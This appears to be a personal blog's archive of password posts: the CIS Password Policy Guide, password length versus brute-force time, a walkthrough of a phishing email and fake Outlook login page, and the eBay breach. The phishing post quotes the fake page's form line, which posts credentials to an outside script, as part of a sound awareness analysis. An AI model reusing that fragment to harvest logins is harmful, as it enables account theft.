Tag Archives: password

CIS Password Policy Guide – A Quantum Leap in User Experience and Security

8 August 2020

The Password Policy Guide(1) published by the Center for Internet Security (CIS) on 29 July 2020 drowned in the omnipresent noise of vulnerabilities and data breaches.

Wrongly, because the CIS guide puts an end to the commonly accepted practice of complex passwords, namely those that are easy to crack but hard to remember.

The guide recommends:

  • The use of passphrases because users will select longer, more-secure passwords.
  • Event-based password expiration with an annual change as a backstop.
  • And the use of password managers.

Especially for password managers the guide recommends:

Use of these should be actively encouraged for use with password-only authentication systems (especially if the user needs to manage access to multiple of these systems)”

And, where “feasible, using MFA instead of just a master password to gain access to the Password Manager is preferred”

Yubikey for MFA and KeePassXC

For some months now I mainly work on a Linux desktop. Unfortunately, I often must switch to Windows because of Word and Powerpoint. So, I use KeePassXC to allow easy switching between the operating systems.

My cloud account is secured with Yubikey, and so is my KeePassXC database. Works fine on Windows and Linux.

To boost user experience and password security, please give the CIS Password Policy Guide the attention it deserves.

Have a great weekend.


  1. White Paper: CIS Password Policy Guide [Internet]. Center for Internet Security. [cited 2020 Aug 8]. Available from: https://www.cisecurity.org/white-papers/cis-password-policy-guide/.

It’s all about strong passwords, but what is a strong password?

11 October 2014

In his report Apple security depends on users, hack shows. Warwick Ashford talks about the latest Apple security issues:

‘However, the effectiveness of the controls Apple has put in place to keep passwords secure ultimately depends on the password users choose, said James Lyne, global head of research at Sophos.’

To put it concisely: It’s all about strong passwords.

But what is a strong Password?

There are lots of advices how a build a strong password like ‘#Q7fr%78’. Unfortunately those passwords are really hard to remember and to input. Some days ago I watched a webinar about WordPress security where a different approach was presented.

It’s all about password length because the number of combinations an attacker has to try in a brute force attack depends essentially on the length of the password:

Number of combinations = [Number of characters] to the power of [length of your password]

That’s just boring math. Thus let me show what this means by an example:

If you choose a password from lowercase letters ‘a..z’ only, the number of characters is 26. For a four character password like ‘abcd’ the number of combinations an attacker has to try is

26 to the power of 4 = 26 x 26 x 26 x 26 = 456976.

That takes about 0,2 milliseconds on a desktop computer with Intel I7 processor for cracking. Four characters are definitely too short!

For a 12 character password like ‘abcdefghijkl’ the number of combinations an attacker has to try is

26 to the power of 12 = 95428956661682200, and the time to crack is about 1.5 years.

The following table shows the cracking time in relation to the password length:

Password cracking time vs. lenght

Password cracking time vs. lenght

The yellow marked shows the one-year-time-to-crack for the character set. The one-year-time-to-crack is the password length where an attacker with an Intel I7 processor based computer needs one year to find the combination with a brute force attack. For our plain character set the one-year-time-to-crack is 12.

With character set ‘a..z A..Z0..9’ the one-year-time-to-crack is 10, With the complex character set ‘a..z A..Z0..9 _-%$§&/()#=?’ the one-year-time-to-crack is 9.

Even with the complex character set you should use at least 9 characters.

As a result we get: It’s all about the password length! The influence of the character set is negligible. Even with the plain character set one could create hard to crack passwords.

I would recommend to use at least 14 characters even with the complex character set. Just to be ready for faster CPUs and to anger the NSA!

How to build strong passwords?

My passwords are easy to build and remember. Start with 4 randomly selected words, in total more than 14 characters, like

‘Never use the word.’

This password is rated ‘Strong’ by the Microsoft password checker. Never use the first words of your favourite song or something you published on Facebook or elsewhere, because an attacker will do some social engineering and use this results first.

Strong is not enough, thus write the first character of each word in capital letters and add a special character or two at both ends:

‘#Never Use The Word._‘

This version is rated ‘Best’.

If you are a masochist, hurt yourself and change the first vowel in each word to a number:

‘#N1ver 2he Th3 W4rd._‘

Isn’t this an easy to remember password? 😉


I am phished!

11 September 2014

During my vacation I got some well made phishing mails. Since an iPad is not the best device for analyzing phishing mails I filed them for further processing at home.

Hotmail Phishing Mail

Hotmail Phishing Mail

It is obvious that this is a phishing email:

  1. The Hotmail Team would never use an email address like someone@fastmail.fm to communicate with customers.
  2. The support team would never notify 113 recipients with a single mail due to privacy reasons.

Normally I drop such mails immediately but sometimes I do some further analysis to keep awareness high.

Thus I clicked the URL and got a very puzzling dialog box in Internet Explorer:

Verify Your Account Dialog

Verify Your Account Dialog

This dialog tells us that phishing will start soon! By now, it should be clear that something is wrong because Outlook will never display a message like this.

Finally, a faked Outlook login page is displayed:

Outlook Login Phishing Site

Outlook Login Phishing Site

Again, it is obvious that this is really well made fake:

  1. The site address is not Outlook.com.
  2. Site access is not secured. The http protocol is used instead of the https protocol.
  3. A Validate button is displayed instead of a Sign in button.

It is this Validate button that sends your login credentials to the phishing site:

form name=”f1″ action=”http://johnbomb.altervista.org/fi.php” method=”POST” novalidate …

For more details activate menu ‘Developer Tools’ or hit ‘F12’ and use the Inspect function from the context menu.

What do we learn from this?

Phishing mails and sites are easy to recognize. Just be aware of the danger!

The eBay data breach – Is hashing of passwords the appropriate response?

10 June 2014

The news about the data theft at eBay have almost electrified me. Not due to fears of losing my private data, I am not eBay customer, but the details under which the theft took place are interesting for me from a professional point of view.

My first thought was: This was an Insider Attack!

The IT departments of large companies are doing a very good job in operating the servers connected to the internet. I would have been very surprised about an attack through servers at the company’s border to the internet.

The information published by eBay at 21 May 2014 [1] saved my day:

‘Cyberattackers compromised a small number of employee log-in credentials, allowing unauthorized access to eBay’s corporate network.’

I am not at all surprised that eBay discovered the loss of customer information with a two month delay. According to the Ponemon Study 2013 [2] the average time to resolve attacks by ‘malicious insiders’ is 65.5 days in 2012 (57.1 days in 2011). That fits well even in this case.

But I am somewhat puzzled by the discussion in some blogs whether encryption is the adequate method to protect sensitive and private data from unauthorized access. Hashing is praised as a better method for protecting passwords.

In my opinion this discussion goes hardly far enough. The loss of e-mail address, physical address, and date of birth is to take at least as seriously as the loss of passwords, since this information enables e.g. professionally made targeted phishing attacks. And, as we all know, an experienced hacker can attack even a hashed password, in particular if he has enough time behind closed doors. See [3] for amazing details about cracking of hashed passwords.

Just new technology will not necessarily increase the overall security because the root causes for this data breach are more likely a lack of security awareness and training. Therefore, only the classic PPT approach, which includes People, Processes and Technology, will lead to an increased overall security.
PPT - People, Processes, Technology

PPT – People, Processes, Technology